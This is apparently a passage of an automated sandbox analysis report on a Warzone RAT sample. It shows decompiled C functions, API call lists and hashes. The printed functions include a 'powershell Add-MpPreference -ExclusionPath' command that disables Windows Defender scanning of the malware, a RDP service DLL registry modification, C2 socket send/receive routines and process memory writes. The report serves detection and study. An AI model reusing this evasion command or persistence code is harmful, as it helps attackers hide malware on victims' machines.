                                  • Opcode Fuzzy Hash: 75b9c23a000a5adcdb465497512319edbf0587ad7d0d336b37f382028eb078bb
                                  • Instruction Fuzzy Hash: EB114C71D00209BACB14EFA2C9928EEBB78EE50705F10016AE801B72C1DB785F05CB94
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D856, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 56registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040D856(void* __ecx, void* __edx) {
				void* _v12;
				void* _v16;
				short* _v20;
				int _v24;
				char _v28;
				char _v36;
				void* _t26;
				void* _t28;
				void* _t43;
				int _t44;
				void* _t45;

				_t43 = __edx;
				_t45 = __ecx;
				_t44 = 0;
				_v12 = 0;
				E004036F7( &_v20, L"SYSTEM\\CurrentControlSet\\Services\\TermService\\Parameters");
				_v28 = 0;
				_v24 = 0;
				if(RegOpenKeyExW(0x80000002, _v20, 0, 0x102,  &_v12) == 0) {
					_t26 = E00403333(_t45 + 0x34, _t43,  &_v36);
					_t28 = E004125DF( &_v12, E004036F7( &_v16, L"ServiceDll"), _t26, 2);
					E00405FEB(_v16);
					_v16 = 0;
					E00403148( &_v36);
					E00412554( &_v12);
					if(_t28 != 0) {
						_t44 = 1;
					}
				}
				E00403148( &_v28);
				E00405FEB(_v20);
				E00412554( &_v12);
				return _t44;
			}














                                  0x0040d856
                                  0x0040d85e
                                  0x0040d860
                                  0x0040d86a
                                  0x0040d86d
                                  0x0040d875
                                  0x0040d882
                                  0x0040d892
                                  0x0040d89d
                                  0x0040d8b4
                                  0x0040d8be
                                  0x0040d8c6
                                  0x0040d8c9
                                  0x0040d8d1
                                  0x0040d8d8
                                  0x0040d8da
                                  0x0040d8da
                                  0x0040d8d8
                                  0x0040d8de
                                  0x0040d8e6
                                  0x0040d8ee
                                  0x0040d8f8

                                  APIs
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,00000000,?,00413483,00000000,00000000,.bss,00000000), ref: 00403700
                                    • Part of subcall function 004036F7: lstrlenW.KERNEL32(00413483,?,00413483,00000000,00000000,.bss,00000000), ref: 00403717
                                    • Part of subcall function 004036F7: lstrcpyW.KERNEL32(?,00413483), ref: 00403732
                                  • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000102,?,SYSTEM\CurrentControlSet\Services\TermService\Parameters), ref: 0040D88A
                                    • Part of subcall function 004125DF: RegSetValueExW.ADVAPI32(?,000F003F,00000000,80000001,?,?,?,?,004127D2,?,?,00000003,80000001,?,000F003F,00000000), ref: 004125FE
                                    • Part of subcall function 00405FEB: VirtualFree.KERNELBASE(?,00000000,00008000,00405D70,00000000,?,00412694,?,?,0041577A), ref: 00405FF3
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  • ServiceDll, xrefs: 0040D8A3
                                  • SYSTEM\CurrentControlSet\Services\TermService\Parameters, xrefs: 0040D862
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$CloseFreeOpenValueVirtuallstrcpy
                                  • String ID: SYSTEM\CurrentControlSet\Services\TermService\Parameters$ServiceDll
                                  • API String ID: 2854241163-387424650
                                  • Opcode ID: 6f802987656521ece80262853ed865ace36b12f590ac2954457a01a4c77227ab
                                  • Instruction ID: f4c174c2a9310d4c42edb30c9c3d52768df1180ce11ea76c469564d993fc98ad
                                  • Opcode Fuzzy Hash: 6f802987656521ece80262853ed865ace36b12f590ac2954457a01a4c77227ab
                                  • Instruction Fuzzy Hash: C2111C75D00219ABCB14EF92CC96DEFBB79EF94704F40406EE812B22D1DB785A45CA68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412569, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 85%
                                  			E00412569(void* __edx, short** _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				void* __ecx;
				void* _t14;
				short** _t23;
				void** _t25;
				void** _t32;
				char* _t36;

				_push(_t25);
				_push(_t25);
				_t23 = _a4;
				_t32 = _t25;
				_v8 = 0;
				_v12 = 0;
				if(RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, 0,  &_v8) != 0) {
					L5:
					_t14 = 0;
				} else {
					_t36 = E00401085(_v8);
					if(RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, _t36,  &_v8) != 0) {
						goto L5;
					} else {
						E004030CC(_a8, _t36, _v8);
						if(_t36 != 0) {
							E00401099(_t36);
						}
						_t14 = 1;
					}
				}
				return _t14;
			}











                                  0x0041256c
                                  0x0041256d
                                  0x0041256f
                                  0x00412578
                                  0x00412584
                                  0x00412589
                                  0x00412594
                                  0x004125d6
                                  0x004125d6
                                  0x00412596
                                  0x0041259f
                                  0x004125b8
                                  0x00000000
                                  0x004125ba
                                  0x004125c1
                                  0x004125c8
                                  0x004125cb
                                  0x004125d0
                                  0x004125d3
                                  0x004125d3
                                  0x004125b8
                                  0x004125dc

                                  APIs
                                  • RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00000000,?VA,?,?,?,00412B8B,?,?,80000001), ref: 0041258C
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • RegQueryValueExW.ADVAPI32(?,74A313FB,00000000,74A313FB,00000000,00000000,?,00412B8B,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 004125B0
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$ProcessQueryValue$AllocateFree
                                  • String ID: ?VA
                                  • API String ID: 3459632794-1028452459
                                  • Opcode ID: 0f9460df5ca525744c9f118b6e5f6efa6d882a9783e30541dd17392b9dbe3837
                                  • Instruction ID: ef5b91e0520f3c1ad74f83bd351b8b7f17400620d7ac54be9350e6622f7c98ba
                                  • Opcode Fuzzy Hash: 0f9460df5ca525744c9f118b6e5f6efa6d882a9783e30541dd17392b9dbe3837
                                  • Instruction Fuzzy Hash: E7019E72900118BFEB15DFA1DD85DEF7BBDEF08354B10007AF901E2250EA749F959AA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00414F7E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 53processCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00414F7E(void* __ecx, void* __eflags) {
				CHAR* _t21;
				CHAR* _t22;

				_t22 = E00401085(0x100);
				_t21 = E00401085(0x100);
				E00401052(_t22, 0, 0x100);
				E00401052(_t21, 0, 0x100);
				GetModuleFileNameA(0, _t22, 0x100);
				E0040102C(_t21, "powershell Add-MpPreference -ExclusionPath ", E00401133("powershell Add-MpPreference -ExclusionPath "));
				_t1 =  &(_t21[0x2b]); // 0x2b
				E0040102C(_t1, _t22, 3);
				_t2 =  &(_t22[0xff]); // 0xff
				E0040102C(E00401133(_t21) + _t21, _t2, 1);
				return WinExec(_t21, 0);
			}





                                  0x00414f8d
                                  0x00414f98
                                  0x00414f9a
                                  0x00414fa3
                                  0x00414faf
                                  0x00414fc3
                                  0x00414fca
                                  0x00414fcf
                                  0x00414fd7
                                  0x00414fea
                                  0x00414ffe

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • GetModuleFileNameA.KERNEL32(00000000,00000000,00000100,?,?,?,?,?,?,?,00000000,74A313FB,00000000,004156DE), ref: 00414FAF
                                  • WinExec.KERNEL32 ref: 00414FF5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateExecFileModuleNameProcess
                                  • String ID: powershell Add-MpPreference -ExclusionPath
                                  • API String ID: 1183730998-2194938034
                                  • Opcode ID: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                  • Instruction ID: f9242cdbd1c9b696a892a29a9369df0dc44288307f8c57903ac4db52bc2fe90b
                                  • Opcode Fuzzy Hash: 0fce4c3b90f01b99dc6074e159970c8f1f4ae8f7f4535012ad248e759a026d52
                                  • Instruction Fuzzy Hash: E7F062B154025476F22032725CCBFBF566CDF89758F04043BF684B55D2EA7C994141BD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004056F5, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 86%
                                  			E004056F5(void* __ecx, void* __edx, intOrPtr _a4) {
				char _v12;
				char _v16;
				char _v24;
				void* _t21;
				void* _t38;
				intOrPtr _t39;
				void* _t40;

				_t37 = __edx;
				_t38 = __ecx;
				if( *((intOrPtr*)(__ecx + 0xc)) != 0xffffffff) {
					E00403115( &_v24, __edx, E004034D1( &_v12, "warzoneTURBO"));
					_t31 = _v12;
					E00405FEB(_v12);
					_t39 = _a4;
					_t32 = _t40;
					E0040315E(_t40, _t39);
					E0040315E(_t40,  &_v24);
					_t7 =  &_v16; // 0x405062
					_t21 = E004061F0(_t7, _t37, _t40, _t32, _v12, _t31);
					_t9 =  &_v16; // 0x405062
					_t10 = _t38 + 0xc; // 0x415e66
					__imp__#19( *_t10,  *_t9,  *((intOrPtr*)(_t39 + 4)), 0);
					E00403148( &_v16);
					E00403148( &_v24);
					return 0 | _t21 != 0xffffffff;
				}
				return 0;
			}










                                  0x004056f5
                                  0x004056fe
                                  0x00405704
                                  0x0040571b
                                  0x00405720
                                  0x00405723
                                  0x00405728
                                  0x0040572d
                                  0x00405730
                                  0x0040573d
                                  0x00405742
                                  0x00405745
                                  0x00405752
                                  0x00405755
                                  0x00405758
                                  0x00405769
                                  0x00405771
                                  0x00000000
                                  0x00405776
                                  0x00000000

                                  APIs
                                  • send.WS2_32(00415E66,bP@,?,00000000), ref: 00405758
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: send
                                  • String ID: bP@$warzoneTURBO
                                  • API String ID: 2809346765-1210837753
                                  • Opcode ID: 760b336eb2069862a5e6fc8d6d50c3ccd8c24c0d1d3194bec67f328afdb6f1e2
                                  • Instruction ID: f3416621e5f2c5c02f3395680495e6a6f54d57ba278d3546227d2c899631d6b7
                                  • Opcode Fuzzy Hash: 760b336eb2069862a5e6fc8d6d50c3ccd8c24c0d1d3194bec67f328afdb6f1e2
                                  • Instruction Fuzzy Hash: 4A01C431900009BBCB04BFA6DC42CEEBB68DF14325B10423EF122761D1DB396B058A68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412612, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E00412612(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
				long _t10;
				short** _t22;
				void** _t23;

				_t23 = __ecx;
				_t22 = _a8;
				if(_a16 == 0 || E00410C50(_a4, _t22) != 0) {
					L4:
					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23);
					if(_t10 != 0) {
						goto L6;
					}
					return _t10 + 1;
				} else {
					_a16 = 0;
					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
						L6:
						return 0;
					}
					E00412554(_t23);
					goto L4;
				}
			}






                                  0x00412619
                                  0x0041261c
                                  0x00412622
                                  0x00412657
                                  0x00412661
                                  0x00412669
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412632
                                  0x00412635
                                  0x0041264e
                                  0x0041266e
                                  0x00000000
                                  0x0041266e
                                  0x00412652
                                  0x00000000
                                  0x00412652

                                  APIs
                                  • RegOpenKeyExW.ADVAPI32(74A313FB,00000000,00000000,?,?,?,?,?VA,?,00412B64,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows NT\CurrentVersion\Windows), ref: 00412661
                                    • Part of subcall function 00410C50: RegOpenKeyExW.ADVAPI32(74A313FB,00000000,00000000,00020019,00000000,74A313FB,?,0041262E,?,?,?VA,?,00412B64,80000001,?,000F003F), ref: 00410C66
                                  • RegCreateKeyExW.ADVAPI32(74A313FB,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,?VA,?,00412B64,80000001,?), ref: 00412646
                                    • Part of subcall function 00412554: RegCloseKey.ADVAPI32(?,?,004126D3,?,?,0041577A), ref: 0041255E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Open$CloseCreate
                                  • String ID: ?VA
                                  • API String ID: 1752019758-1028452459
                                  • Opcode ID: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                  • Instruction ID: 4932445430126be2ff0c3f65702f86cceb6eb04fd32848aa65fa8fc0dd82d40c
                                  • Opcode Fuzzy Hash: 29839ccb8850909feca5f7e178c66ded91a73c690c585cbb959138e2f25b0d0e
                                  • Instruction Fuzzy Hash: 5A01197120020EBFAB119F62DE84DFB7B6EEF44398B10402AF905D1250E7B5CDA19AB5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0041068D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43networkCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 58%
                                  			E0041068D(intOrPtr* _a4) {
				intOrPtr* _t3;
				void* _t4;
				void* _t5;
				intOrPtr _t7;
				intOrPtr _t11;
				void* _t15;

				_t3 = _a4;
				_t7 =  *_t3;
				_t11 =  *((intOrPtr*)(_t3 + 8));
				if( *0x426755 != 0) {
					while(1) {
						_t4 = E00401085(0x2000);
						_t13 = _t4;
						__imp__#16(_t11, _t4, 0x1f40, 0);
						if(_t4 == 0xffffffff || _t4 == 0) {
							break;
						}
						E004106F9(_t13, _t4, _t7);
						_t5 = E00401099(_t13);
						_t15 = _t15 + 0xc;
						if( *0x426755 != 0) {
							continue;
						}
						L7:
						return _t5;
					}
					__imp__#3(_t11);
					_t5 = E00401099(_t13);
					goto L7;
				}
				return _t3;
			}









                                  0x00410697
                                  0x0041069c
                                  0x0041069e
                                  0x004106a1
                                  0x004106a4
                                  0x004106a9
                                  0x004106b6
                                  0x004106ba
                                  0x004106c3
                                  0x00000000
                                  0x00000000
                                  0x004106cd
                                  0x004106d3
                                  0x004106d8
                                  0x004106e2
                                  0x00000000
                                  0x00000000
                                  0x004106f4
                                  0x00000000
                                  0x004106f4
                                  0x004106e7
                                  0x004106ee
                                  0x00000000
                                  0x004106f3
                                  0x004106f8

                                  APIs
                                    • Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,004134B7,00400000,?,?,00000000,?,?,00415553), ref: 0040108B
                                    • Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,00415553), ref: 00401092
                                  • recv.WS2_32(?,00000000,00001F40,00000000), ref: 004106BA
                                  • closesocket.WS2_32(?), ref: 004106E7
                                    • Part of subcall function 004106F9: send.WS2_32(?,00000000,00000002,00000000), ref: 0041074A
                                    • Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00413499,00000000,00000000,00000000,00000000,.bss,00000000), ref: 0040109F
                                    • Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$Process$AllocateFreeclosesocketrecvsend
                                  • String ID: <5Ik
                                  • API String ID: 1908950363-1120072674
                                  • Opcode ID: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                  • Instruction ID: cf5c065e532922d4a3d76e571e2bf2fb24ffb7083d1690fd6d685bf59492f6b1
                                  • Opcode Fuzzy Hash: 21b88c655a3f90420948bd08a6e993c7b1e70d5893b0c84512869bef3746b2a7
                                  • Instruction Fuzzy Hash: 85F09C716042442EE22063256C4AFFF379CCFC57ACF14016BFA04561E1DAF85CD282AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004056D4, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 11COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: closesocketshutdown
                                  • String ID: <5Ik
                                  • API String ID: 572888783-1120072674
                                  • Opcode ID: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                  • Instruction ID: 284792fdbf7bd6b26f007be0ad5fa8b9be9590e38c7f66b8807de1f76de5a812
                                  • Opcode Fuzzy Hash: 18556ba7e844cce46ebd37ac9a9e97582c4fa6a7267480bb493a8cf1ab882a1f
                                  • Instruction Fuzzy Hash: 6FD0C931018B109FD7311B14ED0EF92BBB1AB00332F10C65DE8BA444F0C7A06850DF84
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040ECE1, Relevance: 5.1, APIs: 4, Instructions: 77memoryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 100%
                                  			E0040ECE1(void** __ecx, void** __edx, void* __eflags) {
				void** _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				void* _v24;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v40;
				char _v100;
				void* _t35;
				void* _t38;
				void* _t62;

				_v8 = __edx;
				_t62 = 0;
				_v16 =  &_v100;
				_v24 = 0;
				_v12 = 0x426970;
				_v20 = 0x426970;
				_v28 =  *((intOrPtr*)(__ecx + 4));
				if(E0040EE24( &_v16, __ecx, 0x40) != 0 && _v100 == 0x5a4d) {
					_v32 =  *((intOrPtr*)(__ecx)) + _v40;
					_t35 = LocalAlloc(0x40, 0x18);
					_v16 = _t35;
					if(_t35 != 0) {
						E0040EE24( &_v16,  &_v32, 0x18);
						_t44 =  ==  ? 0xf8 : 0x108;
						_t38 = LocalAlloc(0x40,  ==  ? 0xf8 : 0x108);
						_v24 = _t38;
						if(_t38 != 0) {
							_t62 = E0040EE24( &_v24,  &_v32, _t44);
							if(_t62 == 0) {
								LocalFree(_v24);
							} else {
								 *_v8 = _v24;
							}
						}
						LocalFree(_v16);
					}
				}
				return _t62;
			}















                                  0x0040ecec
                                  0x0040ecf2
                                  0x0040ecf4
                                  0x0040ecff
                                  0x0040ed02
                                  0x0040ed07
                                  0x0040ed0f
                                  0x0040ed1a
                                  0x0040ed3a
                                  0x0040ed3d
                                  0x0040ed3f
                                  0x0040ed44
                                  0x0040ed4e
                                  0x0040ed66
                                  0x0040ed6c
                                  0x0040ed74
                                  0x0040ed79
                                  0x0040ed87
                                  0x0040ed8c
                                  0x0040ed9b
                                  0x0040ed8e
                                  0x0040ed94
                                  0x0040ed94
                                  0x0040ed8c
                                  0x0040eda0
                                  0x0040eda0
                                  0x0040ed44
                                  0x0040eda8

                                  APIs
                                    • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,?,00000000,00000000,?,00000000,00000000), ref: 0040EE72
                                    • Part of subcall function 0040EE24: WriteFile.KERNEL32(?,`@,00426970,00000150,00000000), ref: 0040EE92
                                  • LocalAlloc.KERNEL32(00000040,00000018,00000001,?,0040EAD8), ref: 0040ED3D
                                    • Part of subcall function 0040EE24: WriteProcessMemory.KERNEL32(?,?,`@,00426970,00000000,?,00000000,00000000), ref: 0040EEB3
                                    • Part of subcall function 0040EE24: LocalAlloc.KERNEL32(00000040,00426970,?,00000000,00000000), ref: 0040EEC0
                                    • Part of subcall function 0040EE24: LocalFree.KERNEL32(?), ref: 0040EEF6
                                  • LocalAlloc.KERNEL32(00000040,00000108), ref: 0040ED6C
                                  • LocalFree.KERNEL32(00000000), ref: 0040EDA0
                                    • Part of subcall function 0040EE24: SetFilePointer.KERNEL32(?,`@,00000000,00000000,?,00000000,00000000), ref: 0040EF1A
                                    • Part of subcall function 0040EE24: ReadFile.KERNEL32(?,?,00426970,00000150,00000000), ref: 0040EF37
                                    • Part of subcall function 0040EE24: ReadProcessMemory.KERNEL32(?,`@,?,00426970,00000000,?,00000000,00000000), ref: 0040EF4F
                                  • LocalFree.KERNEL32(?), ref: 0040ED9B
                                  Memory Dump Source
                                  • Source File: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: Local$File$AllocFree$MemoryPointerProcessReadWrite
                                  • String ID:
                                  • API String ID: 2785045919-0
                                  • Opcode ID: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                  • Instruction ID: 844012893b931533083f36e29c55c77bc0a60c617dbdfc6ad0899e7f9f39f4eb
                                  • Opcode Fuzzy Hash: 22fa37b712431e4a8c17cca72e3668fb64202397e257683892f01d797e81ccf6
                                  • Instruction Fuzzy Hash: 32213B71E0020E9BCB10DFAAC9419DEF7B5EF84700F15846BE500BB290EB78AE01CB95
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Analysis Process: images.exe PID: 2168 Parent PID: 2308 images.exeCOMMON

                                  Executed Functions

                                  Function 00350A50, Relevance: 1.9, Instructions: 1881COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6cdb3c2b49929048136401609cbf9934a57b6a659b250b22e81660ffd5685234
                                  • Instruction ID: 179cc55288daab9516b34f6e1dc1ce7fb8914e5025fd4306648d44c3b987cc2d
                                  • Opcode Fuzzy Hash: 6cdb3c2b49929048136401609cbf9934a57b6a659b250b22e81660ffd5685234
                                  • Instruction Fuzzy Hash: AA13B474A11618CFC765DF34C894BA9B7B6FF8A301F2092E9E5096B260DB316E84CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00350A40, Relevance: 1.8, Instructions: 1850COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 99b58c1a1bd888ba3f902bb000504a6cacffb28b41f1e01dfcec7d34a6794926
                                  • Instruction ID: 324b24a101f5af88d0a2fe44ea11a1f9e503c4f28933cae6e345822314e52929
                                  • Opcode Fuzzy Hash: 99b58c1a1bd888ba3f902bb000504a6cacffb28b41f1e01dfcec7d34a6794926
                                  • Instruction Fuzzy Hash: F913B574A11618CFC765DF34C894BA9B7B6FF8A301F2092E9E5096B260DB316E84CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0035F450, Relevance: 1.5, Strings: 1, Instructions: 221COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b.
                                  • API String ID: 0-890368386
                                  • Opcode ID: d0d5461627b6494dd10350cb6b5a12f352f06765851346a413df11755793b23d
                                  • Instruction ID: fc8c01935047d11cf3cafc9340f6a7e0bd108a4df1dddf30456a59f6a45a4fc9
                                  • Opcode Fuzzy Hash: d0d5461627b6494dd10350cb6b5a12f352f06765851346a413df11755793b23d
                                  • Instruction Fuzzy Hash: 4C912770D04219DFCB05DFE5D5818AEBBF5FF8A301F20992AD806BB224E7309A45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00358938, Relevance: .3, Instructions: 259COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ac58ad391dad82a2a9b0f7f8b2f313611bb5836c5ad9644a3c7ca146ec2c4ded
                                  • Instruction ID: 15659a09bbf0a8ffe11a15655d422d4041d518c6293a8c953ed335158d8314b6
                                  • Opcode Fuzzy Hash: ac58ad391dad82a2a9b0f7f8b2f313611bb5836c5ad9644a3c7ca146ec2c4ded
                                  • Instruction Fuzzy Hash: D3C14C7490520ADFCB05CFA4C5848BEFBB5FF89311B249555C816BB624CB34AA86CFA1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0035CD28, Relevance: .2, Instructions: 214COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 46accf5907867ef5d32850b5482cb926ebb746713a6939b494c01d6672f37eaf
                                  • Instruction ID: 6fc681e5f0cdc32668f438b9bd9551d0d6867085b6783e6d54ef1ff2ba487027
                                  • Opcode Fuzzy Hash: 46accf5907867ef5d32850b5482cb926ebb746713a6939b494c01d6672f37eaf
                                  • Instruction Fuzzy Hash: 469152B0D152099FCB04DFEAC5809AEFBF2BF89315F20D129E815AB264D7349A45DF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0035CD18, Relevance: .2, Instructions: 213COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3099234215d7ea1d34d9602728ca6cc5e71608eaed024341af911a438a75005e
                                  • Instruction ID: 9abfbd9ab5950337d286669b2f3775105288fd1ef50580c3fa71d2b1de391931
                                  • Opcode Fuzzy Hash: 3099234215d7ea1d34d9602728ca6cc5e71608eaed024341af911a438a75005e
                                  • Instruction Fuzzy Hash: 179152B0D152099FCB04DFEAC5809AEBBF2BF89315F24D12AD815EB264D7349A45CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00355C98, Relevance: .2, Instructions: 175COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 9bc266bc6488e40b63c57e05dace8e1681daf3fc69197bb8532dfba88acf16e3
                                  • Instruction ID: fba24fcc89b8edd6986e71696deec346ceae601f27065a7e9a8c6e8de981eac1
                                  • Opcode Fuzzy Hash: 9bc266bc6488e40b63c57e05dace8e1681daf3fc69197bb8532dfba88acf16e3
                                  • Instruction Fuzzy Hash: 29713770D015088FCB04DFEAD5849ADFBF2BF98321F24C125E864AB3A5D734AA45CB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00356A38, Relevance: .2, Instructions: 170COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e1422d4d00b101ddfa48764fb8a4fd5b0dfbc49934b9cf62e00f85727e3f8c2b
                                  • Instruction ID: b3821226ddc233afa19f6dfa036cee89e58a6039134395eb8a771700336b10d6
                                  • Opcode Fuzzy Hash: e1422d4d00b101ddfa48764fb8a4fd5b0dfbc49934b9cf62e00f85727e3f8c2b
                                  • Instruction Fuzzy Hash: B371D274E11219DFCB08CFE5C941AAEBBB2FF89301F20952AD805BB264DB345A45CF50
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0035D141, Relevance: .1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000011.00000002.2134841350.0000000000350000.00000040.00000001.sdmp, Offset: 00350000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c0e2298629b92c37c705d20bfc471f23c35f2a37be550cfe7df6b3783e86b4fa
                                  • Instruction ID: bf6aa61cfc94e732f67aa1140e30c84b9e7d53e5d53d9263187d758c123231b3
                                  • Opcode Fuzzy Hash: c0e2298629b92c37c705d20bfc471f23c35f2a37be550cfe7df6b3783e86b4fa
